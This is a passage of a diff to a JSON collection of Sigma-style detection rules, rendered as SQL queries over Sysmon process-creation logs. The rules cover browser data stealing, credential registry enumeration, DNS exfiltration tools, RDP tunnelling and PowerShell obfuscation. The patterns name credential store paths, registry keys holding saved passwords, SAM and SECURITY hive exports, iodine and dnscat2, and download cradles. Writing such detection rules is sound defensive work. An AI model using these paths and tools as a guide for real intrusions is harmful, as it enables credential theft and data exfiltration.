"proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator script" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 
'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - 
"Unknown" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "status": "experimental", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.execution", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' 
AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1218" - ], + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Legitimate admin scripts" + "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", 
+ "status": "experimental", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { "title": "Use Short Name Path in Image", 
@@ -12342,1263 +12237,1205 @@ "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs 
WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": 
"Detects suspicious msiexec process starts with web addresses as parameter", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "status": "experimental", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
